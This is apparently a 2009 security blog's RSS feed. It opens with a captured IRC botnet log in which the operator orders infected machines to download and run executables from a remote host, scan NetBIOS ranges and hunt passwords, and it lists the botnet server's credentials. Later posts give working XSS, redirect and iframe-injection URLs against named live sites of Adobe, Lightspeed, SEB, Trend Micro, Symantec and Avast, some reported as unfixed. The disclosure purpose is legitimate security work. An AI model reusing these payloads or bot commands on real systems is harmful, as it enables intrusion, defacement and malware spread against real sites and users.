    [2009-05-26 18:54] <[-MaX-]-967700> [DOWNLOAD]: Opened: c:\windows\system32\winsmgs.exe.
    [2009-05-26 18:54] <[-MaX-]-781848> [DOWNLOAD]: Opened: c:\windows\system32\winsmgs.exe.
    [2009-05-26 18:54] <[-MaX-]-455515> [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\system32\winsmgs.exe @ 31.6 KB/sec.
    [2009-05-26 18:54] <[-MaX-]-455515> [DOWNLOAD]: Opened: c:\windows\system32\winsmgs.exe.
    [2009-05-26 18:54] <[-MaX-]-554431> [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/Torrent%20Downloader.exe to: c:\windows\system32\winsmgs.exe.
    [2009-05-26 18:54] <[-MaX-]-075439> [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\system32\winsmgs.exe @ 28.9 KB/sec.
    [2009-05-26 18:54] <[-MaX-]-075439> [DOWNLOAD]: Opened: c:\windows\system32\winsmgs.exe.
    [2009-05-26 18:54] <[-MaX-]-681280> [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\system32\winsmgs.exe @ 23.2 KB/sec.
    [2009-05-26 18:54] <[-MaX-]-681280> [DOWNLOAD]: Opened: c:\windows\system32\winsmgs.exe.
    [2009-05-26 18:54] <[-MaX-]-543351> [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\system32\winsmgs.exe @ 19.3 KB/sec.
    [2009-05-26 18:54] <[-MaX-]-543351> [DOWNLOAD]: Opened: c:\windows\system32\winsmgs.exe.
    [2009-05-26 18:54] <[-MaX-]-554431> [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\system32\winsmgs.exe @ 43.4 KB/sec.
    [2009-05-26 18:54] <[-MaX-]-554431> [DOWNLOAD]: Opened: c:\windows\system32\winsmgs.exe.
    [2009-05-26 18:54] <[-MaX-]-359565> [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\system32\winsmgs.exe @ 18.3 KB/sec.
    [2009-05-26 18:54] <[-MaX-]-633840> [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\system32\winsmgs.exe @ 15.8 KB/sec.
    [2009-05-26 18:54] <[-MaX-]-633840> [DOWNLOAD]: Opened: c:\windows\system32\winsmgs.exe.
    [2009-05-26 18:54] <[-MaX-]-359565> [DOWNLOAD]: Opened: c:\windows\system32\winsmgs.exe.
    [2009-05-26 18:55] <MaX> .update http://79.112.132.25:81/Torrent%20Downloader.exe mouse1
    [2009-05-26 18:55] <[-MaX-]-543351> [DOWNLOAD]: Downloaded 347.3KB to C:\DOCUME~1\ww\LOCALS~1\Temp\pqngjgr.exe @ 347.3KB/sec. Updating.
    - [DOWNLOAD]: Downloaded 347.3KB to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\sijugxzz.exe @ 347.3KB/sec. Updating.
    - [DOWNLOAD]: Downloaded 347.3KB to C:\DOCUME~1\Sorin\LOCALS~1\Temp\qvtuhrgo.exe @ 347.3KB/sec. Updating.
    - [DOWNLOAD]: Downloaded 347.3KB to C:\Windows\Temp\pwdlkd.exe @ 347.3KB/sec. Updating.
    - [DOWNLOAD]: Downloaded 347.3KB to C:\Users\dan\AppData\Local\Temp\sggmyvoi.exe @ 347.3KB/sec. Updating.
    - [DOWNLOAD]: Downloaded 347.3KB to C:\DOCUME~1\Marius\LOCALS~1\Temp\pvrbnj.exe @ 347.3KB/sec. Updating.
    - [DOWNLOAD]: Downloaded 347.3KB to C:\DOCUME~1\IONUT~1.ION\LOCALS~1\Temp\kuwvavqb.exe @ 347.3KB/sec. Updating.
    - [UPDATE]: Downloading update from: http://79.112.132.25:81/Torrent%20Downloader.exe.
    - [UPDATE]: Downloading update from: http://79.112.132.25:81/Torrent%20Downloader.exe.
    [2009-05-26 18:55] <[-MaX-]-075439> [UPDATE]: Downloading update from: http://79.112.132.25:81/Torrent%20Downloader.exe.
    - [UPDATE]: Downloading update from: http://79.112.132.25:81/Torrent%20Downloader.exe.
    - [UPDATE]: Downloading update from: http://79.112.132.25:81/Torrent%20Downloader.exe.
    - [UPDATE]: Downloading update from: http://79.112.132.25:81/Torrent%20Downloader.exe.
    - [UPDATE]: Downloading update from: http://79.112.132.25:81/Torrent%20Downloader.exe.
    [2009-05-26 18:55] <[-MaX-]-070294> [UPDATE]: Downloading update from: http://79.112.132.25:81/Torrent%20Downloader.exe.
    - [UPDATE]: Downloading update from: http://79.112.132.25:81/Torrent%20Downloader.exe.
    - [UPDATE]: Downloading update from: http://79.112.132.25:81/Torrent%20Downloader.exe.
    - [UPDATE]: Downloading update from: http://79.112.132.25:81/Torrent%20Downloader.exe.
    [2009-05-26 18:55] <[-MaX-]-967700> [DOWNLOAD]: Downloaded 347.3KB to C:\DOCUME~1\CONSTA~1\LOCALS~1\Temp\ydobkvwc.exe @ 347.3KB/sec. Updating.
    - [DOWNLOAD]: Downloaded 347.3KB to C:\DOCUME~1\mihai\LOCALS~1\Temp\bcyhel.exe @ 347.3KB/sec. Updating.
    - [DOWNLOAD]: Downloaded 347.3KB to C:\DOCUME~1\RADUVI~1\LOCALS~1\Temp\scltdout.exe @ 347.3KB/sec. Updating.
    [2009-05-26 18:55] <[-MaX-]-359565> [DOWNLOAD]: Downloaded 347.3KB to C:\DOCUME~1\user\LOCALS~1\Temp\hnlpzhmf.exe @ 347.3KB/sec. Updating.
    [2009-05-26 18:55] <[-MaX-]-633840> [UPDATE]: Downloading update from: http://79.112.132.25:81/Torrent%20Downloader.exe.
    [2009-05-26 18:55] <[-MaX-]-633840> [DOWNLOAD]: Downloaded 347.3KB to C:\DOCUME~1\ADRIAN\LOCALS~1\Temp\tijmhp.exe @ 347.3KB/sec. Updating.
    [2009-05-26 19:03] <MaX> .stats
    [2009-05-26 19:03] <[-MaX-]-343813> [Scn]: Exploit Statistics: NetBios: 0, NTPass: 0, Dcom135: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, lsass: 0, Total: 0 in 0d 0h 51m.
    - [Scn]: Exploit Statistics: NetBios: 0, NTPass: 0, Dcom135: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, lsass: 0, Total: 0 in 0d 1h 22m.
    - [Scn]: Exploit Statistics: NetBios: 0, NTPass: 0, Dcom135: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, lsass: 0, Total: 0 in 0d 0h 2m.
    - [Scn]: Exploit Statistics: NetBios: 0, NTPass: 0, Dcom135: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, lsass: 0, Total: 0 in 0d 1h 26m.
    - [Scn]: Exploit Statistics: NetBios: 0, NTPass: 0, Dcom135: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, lsass: 0, Total: 0 in 0d 1h 52m.
    - [Scn]: Exploit Statistics: NetBios: 0, NTPass: 0, Dcom135: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, lsass: 0, Total: 0 in 0d 0h 50m.
    - [Scn]: Exploit Statistics: NetBios: 0, NTPass: 0, Dcom135: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, lsass: 0, Total: 0 in 0d 0h 27m.
    - [Scn]: Exploit Statistics: NetBios: 0, NTPass: 0, Dcom135: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, lsass: 0, Total: 0 in 0d 0h 25m.
    - [Scn]: Exploit Statistics: NetBios: 0, NTPass: 0, Dcom135: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, lsass: 0, Total: 0 in 0d 2h 4m.
    [2009-05-26 19:03] <[-MaX-]-134982> [Scn]: Exploit Statistics: NetBios: 0, NTPass: 0, Dcom135: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, lsass: 0, Total: 0 in 0d 0h 7m.
    - [Scn]: Exploit Statistics: NetBios: 0, NTPass: 0, Dcom135: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, lsass: 0, Total: 0 in 0d 1h 0m.
    [2009-05-26 19:03] <[-MaX-]-134453> [Scn]: Exploit Statistics: NetBios: 0, NTPass: 0, Dcom135: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, lsass: 0, Total: 0 in 0d 2h 3m.
    [2009-05-26 19:03] <[-MaX-]-917117> [Scn]: Exploit Statistics: NetBios: 0, NTPass: 0, Dcom135: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, lsass: 0, Total: 0 in 0d 1h 30m.
    [2009-05-26 19:03] <[-MaX-]-761622> [Scn]: Exploit Statistics: NetBios: 0, NTPass: 0, Dcom135: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, lsass: 0, Total: 0 in 0d 0h 33m.
    [2009-05-26 19:04] <MaX> .advscan netbios 100 5 1 -b -r
    [2009-05-26 19:04] <[-MaX-]-137127> [SCAN]: Random Port Scan started on 86.121.x.x:139 with a delay of 5 seconds for 1 minutes using 100 threads.
    - [SCAN]: Random Port Scan started on 192.168.x.x:139 with a delay of 5 seconds for 1 minutes using 100 threads.
    - [SCAN]: Random Port Scan started on 192.168.x.x:139 with a delay of 5 seconds for 1 minutes using 100 threads.
    - [SCAN]: Random Port Scan started on 86.121.x.x:139 with a delay of 5 seconds for 1 minutes using 100 threads.
    - [SCAN]: Random Port Scan started on 79.114.x.x:139 with a delay of 5 seconds for 1 minutes using 100 threads.
    - [SCAN]: Random Port Scan started on 89.115.x.x:139 with a delay of 5 seconds for 1 minutes using 100 threads.
    - [SCAN]: Random Port Scan started on 85.122.x.x:139 with a delay of 5 seconds for 1 minutes using 100 threads.
    - [SCAN]: Random Port Scan started on 78.97.x.x:139 with a delay of 5 seconds for 1 minutes using 100 threads.
    - [SCAN]: Random Port Scan started on 89.42.x.x:139 with a delay of 5 seconds for 1 minutes using 100 threads.
    - [SCAN]: Random Port Scan started on 89.123.x.x:139 with a delay of 5 seconds for 1 minutes using 100 threads.
    [2009-05-26 19:04] <[-MaX-]-314032> [SCAN]: Random Port Scan started on 86.123.x.x:139 with a delay of 5 seconds for 1 minutes using 100 threads.
    [2009-05-26 19:04] <[-MaX-]-343813> [SCAN]: Random Port Scan started on 79.117.x.x:139 with a delay of 5 seconds for 1 minutes using 100 threads.
    [2009-05-26 19:04] <[-MaX-]-134453> [SCAN]: Random Port Scan started on 172.16.x.x:139 with a delay of 5 seconds for 1 minutes using 100 threads.
    [2009-05-26 19:04] <[-MaX-]-917117> [SCAN]: Random Port Scan started on 95.76.x.x:139 with a delay of 5 seconds for 1 minutes using 100 threads.
    [2009-05-26 19:04] <MaX> la asta
    [2009-05-26 19:04] <MaX> daca merge netbios
    [2009-05-26 19:04] <MaX> se raspandesc singuri
    [2009-05-26 19:05] <[-MaX-]-137127> [SCAN]: Finished at 86.121.47.97:139 after 1 minute(s) of scanning.
    [2009-05-26 19:05] <[-MaX-]-881176> [SCAN]: Finished at 192.168.161.84:139 after 1 minute(s) of scanning.
    - [SCAN]: Finished at 89.42.187.219:139 after 1 minute(s) of scanning.
    - [SCAN]: Finished at 78.97.117.159:139 after 1 minute(s) of scanning.
    - [SCAN]: Finished at 192.168.160.103:139 after 1 minute(s) of scanning.
    - [SCAN]: Finished at 86.121.76.29:139 after 1 minute(s) of scanning.
    - [SCAN]: Finished at 89.115.171.14:139 after 1 minute(s) of scanning.
    - [SCAN]: Finished at 85.122.143.156:139 after 1 minute(s) of scanning.
    [2009-05-26 19:05] <[-MaX-]-314032> [SCAN]: Finished at 86.123.45.145:139 after 1 minute(s) of scanning.
    - [SCAN]: Finished at 79.117.138.10:139 after 1 minute(s) of scanning.
    [2009-05-26 19:05] <[-MaX-]-119797> [SCAN]: Finished at 79.114.214.232:139 after 1 minute(s) of scanning.
    - [SCAN]: Finished at 95.76.232.182:139 after 1 minute(s) of scanning.
    [2009-05-26 19:05] <[-MaX-]-761622> [SCAN]: Finished at 89.123.228.232:139 after 1 minute(s) of scanning.
    [2009-05-26 19:05] <[-MaX-]-134453> [SCAN]: Finished at 172.16.201.126:139 after 1 minute(s) of scanning.
    [2009-05-26 19:05] <MaX> .findpass
    [2009-05-26 19:05] <[-MaX-]-343813> [FINDPASS]: Only supported on Windows NT/2000.
    - [FINDPASS]: Only supported on Windows NT/2000.
    - [FINDPASS]: Only supported on Windows NT/2000.
    - [FINDPASS]: Only supported on Windows NT/2000.
    - [FINDPASS]: Only supported on Windows NT/2000.
    - [FINDPASS]: Only supported on Windows NT/2000.
    - [FINDPASS]: Only supported on Windows NT/2000.
    - [FINDPASS]: Only supported on Windows NT/2000.
    - [FINDPASS]: Only supported on Windows NT/2000.
    - [FINDPASS]: Only supported on Windows NT/2000.
    - [FINDPASS]: Only supported on Windows NT/2000.
    - [FINDPASS]: Only supported on Windows NT/2000.
    [2009-05-26 19:05] <[-MaX-]-134453> [FINDPASS]: Only supported on Windows NT/2000.
    [2009-05-26 19:05] <[-MaX-]-917117> [FINDPASS]: Only supported on Windows NT/2000.
    [2009-05-26 19:05] <MaX> pft nu merge :))
    [2009-05-26 19:05] <MaX> cum ;)
    [2009-05-26 19:05] <MaX> e bun oricum*
    [2009-05-26 19:05] <MaX> ai sa mai incercam cu download
    [2009-05-26 19:06] <MaX> :))
    [2009-05-26 19:09] <MaX> http://79.112.132.25:81/123.exe
    [2009-05-26 19:10] <MaX> .download http://79.112.132.25:81/123.exe c:\windows\blabla.exe 1
    [2009-05-26 19:10] <[-MaX-]-343813> [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/123.exe to: c:\windows\blabla.exe.
    - [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/123.exe to: c:\windows\blabla.exe.
    - [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/123.exe to: c:\windows\blabla.exe.
    - [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/123.exe to: c:\windows\blabla.exe.
    - [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/123.exe to: c:\windows\blabla.exe.
    - [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/123.exe to: c:\windows\blabla.exe.
    - [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/123.exe to: c:\windows\blabla.exe.
    - [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/123.exe to: c:\windows\blabla.exe.
    - [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/123.exe to: c:\windows\blabla.exe.
    [2009-05-26 19:10] <[-MaX-]-761622> [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/123.exe to: c:\windows\blabla.exe.
    - [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/123.exe to: c:\windows\blabla.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://79.112.132.25:81/123.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://79.112.132.25:81/123.exe.
    - [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/123.exe to: c:\windows\blabla.exe.
    [2009-05-26 19:10] <[-MaX-]-134982> [DOWNLOAD]: Bad URL, or DNS Error: http://79.112.132.25:81/123.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://79.112.132.25:81/123.exe.
    - [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/123.exe to: c:\windows\blabla.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://79.112.132.25:81/123.exe.
    - [DOWNLOAD]: Bad URL, or DNS Error: http://79.112.132.25:81/123.exe.
    [2009-05-26 19:10] <[-MaX-]-343813> [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\blabla.exe @ 347.3 KB/sec.
    [2009-05-26 19:10] <[-MaX-]-137127> [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\blabla.exe @ 347.3 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\blabla.exe.
    - [DOWNLOAD]: Opened: c:\windows\blabla.exe.
    [2009-05-26 19:10] <[-MaX-]-314032> [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\blabla.exe @ 347.3 KB/sec.
    - [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\blabla.exe @ 347.3 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\blabla.exe.
    [2009-05-26 19:10] <[-MaX-]-681554> [DOWNLOAD]: Opened: c:\windows\blabla.exe.
    [2009-05-26 19:10] <[-MaX-]-917117> [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/123.exe to: c:\windows\blabla.exe.
    [2009-05-26 19:10] <[-MaX-]-596995> [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\blabla.exe @ 49.6 KB/sec.
    [2009-05-26 19:10] <[-MaX-]-596995> [DOWNLOAD]: Opened: c:\windows\blabla.exe.
    [2009-05-26 19:10] <[-MaX-]-881176> [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\blabla.exe @ 34.7 KB/sec.
    [2009-05-26 19:10] <[-MaX-]-881176> [DOWNLOAD]: Opened: c:\windows\blabla.exe.
    [2009-05-26 19:10] <[-MaX-]-134453> [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\blabla.exe @ 34.7 KB/sec.
    [2009-05-26 19:10] <[-MaX-]-134453> [DOWNLOAD]: Opened: c:\windows\blabla.exe.
    [2009-05-26 19:10] <[-MaX-]-917117> [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\blabla.exe @ 21.7 KB/sec.
    [2009-05-26 19:10] <[-MaX-]-917117> [DOWNLOAD]: Opened: c:\windows\blabla.exe.
    [2009-05-26 19:11] *** Disconnected


    The file 123.exe is version 2 for that trojan with other connection settings.

    • Server address: dns-ronetwork.serveirc.com:28829
    • Server password: maxbot677
    • Channel: #ronetwork
    • Channel password: maxbot677
    • Nickname prefix for bots: [-X-]-*


    Quote:
    :my.server.name 501 [-X-]-180188 :Unknown MODE flag
    :my.server.name 501 [-X-]-180188 :Unknown MODE flag
    :[-X-]-180188!~jjandx@ JOIN :#ronetwork
    :my.server.name 353 [-X-]-180188 = #ronetwork :[-X-]-180188 [-X-]-466449 [-X-]-290534 [-X-]-134409 [-X-]-557654 [-X-]-160301 [-X-]-740590 MaX [-X-]-894868 [-X-]-783702 [-X-]-451884 [-X-]-073791 [-X-]-348112
    :my.server.name 366 [-X-]-180188 #ronetwork :End of /NAMES list.


    The address for both botnet servers, dns-ronetwork.serveirc.com was banned by no-ip.

    -TE- wrote:
    [19:07] <-TE-> The address dns-ronetwork.serveirc.com changed the IP from 79.112.136.186 to 0.0.0.0 (botnet server)

    ]]>
    http://nemesis.te-home.net/Forum/3000_News/20090527_How_to_shutdown_a_IRC_botnet__2.html Wed, 27 May 2009 20:47:38 GMT 2709721942
    <![CDATA[Adobe.com Vulnerable to XSS and Redirect]]> http://nemesis.te-home.net/News/20090528_Adobe_com_Vulnerable_to_XSS_and_Redirec.html
    bugs.adobe.com XSS

    Code:
    http://bugs.adobe.com/jira/browse/FB-18507}"><script>alert(String.fromCharCode(88,83,83))</script>

    http://img4.imageshack.us/img4/6655/54953927.jpg  
    http://img24.imageshack.us/img24/4224/42935518.jpg

    feeds.adobe.com XSS

    Code:
    http://feeds.adobe.com/index.cfm?query=byLanguage&languageId=16&languageName=Indonesian}"><script>alert(String.fromCharCode(88,83,83))</script>

    http://img4.imageshack.us/img4/9060/85104373.jpg

    stuff.wip3.adobe.com XSS - Redirect

    Code:
    http://wwwstuff.wip3.adobe.com/events/main.jsp?productID=124&solutionID=&month=}"><script>alert(String.fromCharCode(88,83,83))</script>

    http://img4.imageshack.us/img4/9816/50033365.jpg

    Redirect poc:

    Code:
    http://wwwstuff.wip3.adobe.com/events/main.jsp?productID=124&solutionID=&month=}">"">>>><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""


    w1000.mv.us.adobe.com   XSS - Redirect

    Code:
    http://w1000.mv.us.adobe.com/events/main.jsp?productID=&solutionID=20&month=05"><script>alert(String.fromCharCode(88,83,83))</script>

    http://img4.imageshack.us/img4/2130/41899282.jpg  

    Redirect poc:

    Code:
    http://w1000.mv.us.adobe.com/events/main.jsp?productID=&solutionID=20&month=05}">"">>>><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""

    ]]>
    http://nemesis.te-home.net/News/20090528_Adobe_com_Vulnerable_to_XSS_and_Redirec.html?cpage=1 Thu, 28 May 2009 19:39:01 GMT 636978096
    <![CDATA[Lightspeed Antivirus]]> http://nemesis.te-home.net/News/20090529_Lightspeed_Antivirus.html
    -TE- wrote:
    [06:11] <-TE-> Port scan detected from IP: 209.234.129.156. Last scanned ports: 3128, 8080, 8888, 25, 8080
    [06:12] <-TE-> A blacklisted user from IP 209.234.129.156 (Time Warner Telecom, Inc) sent this request: "GET http://www.microsoft.com/ HTTP/1.1".
    [06:12] <-TE-> A blacklisted user from IP 209.234.129.156 (Time Warner Telecom, Inc) sent this request: "POST http://lti-mail01.ltinetworks.com:25/ HTTP/1.1".
    [06:51] <-TE-> Port scan detected from IP: 209.234.129.156. Last scanned ports: 3128, 8080, 25, 8080, 8888, 3128
    [06:52] <-TE-> A blacklisted user from IP 209.234.129.156 (Time Warner Telecom, Inc) sent this request: "GET http://www.microsoft.com/ HTTP/1.1".
    [06:52] <-TE-> A blacklisted user from IP 209.234.129.156 (Time Warner Telecom, Inc) sent this request: "POST http://lti-mail01.ltinetworks.com:25/ HTTP/1.1".
    [07:31] <-TE-> Port scan detected from IP: 209.234.129.156. Last scanned ports: 8080, 3128, 8888, 8080, 25, 3128
    [07:32] <-TE-> A blacklisted user from IP 209.234.129.156 (Time Warner Telecom, Inc) sent this request: "GET http://www.microsoft.com/ HTTP/1.1".
    [07:32] <-TE-> A blacklisted user from IP 209.234.129.156 (Time Warner Telecom, Inc) sent this request: "POST http://lti-mail01.ltinetworks.com:25/ HTTP/1.1".


    The reason "Time Warner Telecom, Inc" doesn't say much, but as we see, PeerGuardian has this IP blacklisted for a good reason (this time). So I started the logger plugin to see what's going on.

    logger wrote:
    [29-05-2009 01:32:37] 209.234.129.156:50969 ----==<<Connect>>==----
    [29-05-2009 01:32:37] 209.234.129.156:50969 POST http://lti-mail01.ltinetworks.com:25/ HTTP/1.1
    Via: 1.0 KSISERVER09
    Host: lti-mail01.ltinetworks.com
    Content-Type: text/plain
    Connection: Keep-Alive
    Content-Length: 544


    [29-05-2009 01:32:37] 209.234.129.156:50969 RSET
    HELO ksiserverls
    MAIL FROM:<al@ltinetworks.com>
    RCPT TO:<al@ltinetworks.com>
    DATA
    To: bob@macsoft.com
    From: al@ltinetworks.com
    Date: Thu, 28 May 2009 22:41:51 GMT
    Message-Id: <ipmproxytest-1243550511-4332@ksiserverls>
    Sender: al@ltinetworks.com
    Subject: open proxy test
    X-Mailer: ipmproxytest v5.3.0
    X-Proxy-Spec: 92.84.198.40:80/http-post

    This message is a test probe, passed through what appears to
    be an open proxy.

    Proxy parameters:

        Address:  92.84.198.40
        Port:     80
        Type:     http-post
    .
    QUIT

    [29-05-2009 01:32:37] 209.234.129.156:50969 ----==>>Disconnect<<==----


    Well... it's not an open proxy and it's not listed anywhere as being one. And if it's a scan for proxies that can be abused to send mail, Google shows that the owners of possible vulnerable websites are not notified about these scans and see this as an abuse.

    ltinetworks.com
    • ns
      • ns1.lightspeedsystems.com 69.84.207.129 (security.lightspeedsystems.com)
      • ns2.lightspeedsystems.com 69.84.207.130
    • mx
      • 10 ns1.lightspeedsystems.com 69.84.207.129 security.lightspeedsystems.com


    http://www.lightspeedsystems.com/ wrote:
    Powerful Reporting. Actionable Information.

    Comprehensive information about who, when, where, and how your network is being utilized in easy-to-understand reports.
    View data. Investigate issues. Solve problems. Share information.

    Lightspeed Systems partners with schools to ensure safe online learning environments

    Innovative, comprehensive solutions for network security, filtering, monitoring, management, and optimization have emerged from Lightspeed's IT expertise and constant customer interaction.

    Lightspeed is committed to helping schools of all sizes operate their networks effectively and efficiently, so educators can provide safe online teaching and learning environments.

    Total Traffic Control, our flagship solution, gives schools best-of-breed network management and security with a single, comprehensive solution that includes Lightspeed Email Manager, Web Access Manager, Network Traffic Manager, and Security Manager.


    Sounds like a good security company. And I see they made an antivirus too.

    http://img148.imageshack.us/img148/3233/lightspeedav.gif

    Very nice statistics! Lightspeed Antivirus is the best antivirus! From 7226 samples it detected 7226 (100%) and 0 were not detected! What about other antiviruses? Kaspersky detected -3790 out of 7226 samples leaving 7226 - (-3790) = 7226 + 3790 = 11016 undetected (-52.45%). Does this mean it puts more viruses? Before sending an e-mail to ask them, remember their moto: "View data. Investigate issues. Solve problems. Share information".

    CheckOurDatabases.aspx wrote:
    Check Our Databases

    Our databases are accessible, so you can see what is blocked and why. Take a look inside our content and security databases.


    A search for known programs scanned by their antivirus shows a nice debug message with full stack backtrace:

    http://img297.imageshack.us/img297/9373/lightdebug1.gif

    Websites from their database related to http://www.lightspeedsystems.com/:

    http://img136.imageshack.us/img136/1775/lightporn.gif

    Their report pages show information in real time about the usage of their local network,

    http://img136.imageshack.us/img136/8458/lightspeed5.gif

    instant messages (updated in real time),

    http://img136.imageshack.us/img136/4253/lightspeed6.gif

    search queries,

    http://img149.imageshack.us/img149/5089/lightspeed7b.gif

    http://img149.imageshack.us/img149/3858/lightspeed7a.gif

    e-mails ("clean" and spam), and more (BTW the "clean" mails don't look so clean after all). Beware that their message search form loads 6 MB of meta info into a combobox.

    http://img149.imageshack.us/img149/219/lightspeed8.gif

    Today's top search engine queries:

    http://img26.imageshack.us/img26/5975/lightsearch.gif

    Of course, all these report pages are vulnerable to XSS. A few examples as a proof of concept:

    http://reports.lightspeedsystems.com/Reports/Reports/tcIpAddressLookupExternal.aspx?ipaddress=%3C/span%3E%3C/div%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3Cdiv%20style=%22position:absolute;top:0px;left:0;background:fff%2050%%20top%20repeat-x;width:760px;height:640px;margin:16px%20auto;padding:0%2016px;%22%3E%3Cimg%20src=%22http://images.encyclopediadramatica.com/images/7/7e/1225606326503.jpg%22%3E

    http://img26.imageshack.us/img26/2003/lightspeed1.jpg

    http://reports.lightspeedsystems.com/Reports/Reports/saProcessDetails.aspx?FileID=00C00300A46F7A05B9B4B799131D9AB826B6CC9A8F109CADF91D2852&Process=%3C/span%3E%3C/div%3E%3Cdiv%20style=%22background:fff%2050%%20top%20repeat-x;width:760px;height:640px;margin:16px%20auto;padding:0%2016px;%22%3E%3Cimg%20src=%22http://images.encyclopediadramatica.com/images/e/e9/Advice_dog_system_32.jpg%22%3E

    http://img26.imageshack.us/img26/6716/lightspeed3.jpg

    http://reports.lightspeedsystems.com/Reports/Reports/tlHourly.aspx?rulename=%3C/span%3E%3C/div%3E%3Cdiv%20style=%22background:fff%2050%%20top%20repeat-x;width:760px;height:640px;margin:16px%20auto;padding:0%2016px;%22%3E%3Cimg%20src=%22http://images.encyclopediadramatica.com/images/8/8c/R2spambot.jpg%22%3E

    http://img26.imageshack.us/img26/3914/lightspeed4.jpg
    ]]>
    http://nemesis.te-home.net/News/20090529_Lightspeed_Antivirus.html?cpage=1 Fri, 29 May 2009 03:42:56 GMT 1454247889
    <![CDATA[SEB.se search vulnerable to XSS]]> http://nemesis.te-home.net/ http://img20.imageshack.us/img20/9199/seb1.jpg


    http://img3.imageshack.us/img3/4999/seb2d.jpg


    How it could be exploited:
    Code:
    http://taz.vv.sebank.se/cgi-bin/pts3/pos/sebse-wr.asp?ServerKey=Primary&collection=sebse&ResultStart=0&defaultText=Sök+pć+seb.se&lang=se&QueryText=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E



    Note: I waited until the problem was resolved to post this
    ]]>
    http://nemesis.te-home.net/ Sat, 30 May 2009 06:23:56 GMT 317167223
    <![CDATA[XSS Flaw on Trendmicro and Symantec]]> http://nemesis.te-home.net/index.html The staff has been alerted but still no response, so please leave here an valid email.

    Trendmicro

    http://img21.imageshack.us/img21/8430/63154973.jpg

    http://img21.imageshack.us/img21/229/21to.jpg

    POC:- xss + iframe injection

    Code:
    http://enterprise.trendmicro.com/pr/tm/en-us/enterprise/podcast-post.aspx?id=433}"><script>alert(String.fromCharCode(88,83,83))</script>


    http://img21.imageshack.us/img21/1610/111wkk.jpg

    Code:
    http://enterprise.trendmicro.com/pr/tm/en-us/enterprise/podcast-post.aspx?id=433}"<IMG src='http://nemesis.te-home.net'><BR><BR><IFRAME width='230%' height='600px' src='http://nemesis.te-home.net'>

    http://img9.imageshack.us/img9/3194/333ojv.jpg

    Symantec

    http://img21.imageshack.us/img21/9488/symp.jpg

    http://img21.imageshack.us/img21/7919/67853961.jpg  

    and another old bug ,reported 2 times but still not fixed :)

    Code:
    http://www.symantec.com/connect/security/forums/endpoint-protection'"></title><script>alert(xss)</script>><marquee><h1>XSS</h1></marquee>
      
    Code:
    http://www.symantec.com/connect/security/forums/endpoint-protection''>'><script>alert(12135285.117)</script>&e404=>'><script>alert(12135285.117)</script>


    Remember,to see the POC you need to use https(hyper text transport protocol secure) not http

    Update: XSS found by Vektor on https://www-secure.symantec.com/:

    http://img10.imageshack.us/img10/7530/nortonxss.gif

    Proof of concept: https://www-secure.symantec.com/techsupp/jsp/ratethis/nein.jsp?url=http%3A%2F%2Fservice1.symantec.com%2Fsharedtech.nsf%2F0%2Fd59068009e7f27b965257287005fd39d%3FOpenDocument%26%27%3C/li%3E%3C/ul%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3Cimg%20src=%22http://images.encyclopediadramatica.com/images/2/24/Norton_Godfather2.gif%22%3E%3C!--

    ]]>
    http://nemesis.te-home.net/index.html Sat, 30 May 2009 11:16:16 GMT 2068041875
    <![CDATA[Avast - XSS]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    http://www.avast.nl/web/index.php?pageId=33&mode="><script>alert(String.fromCharCode(88,83,83))</script>


    http://img5.imageshack.us/img5/423/44018900.jpg
    http://img5.imageshack.us/img5/2572/34264242.jpg
    ]]>
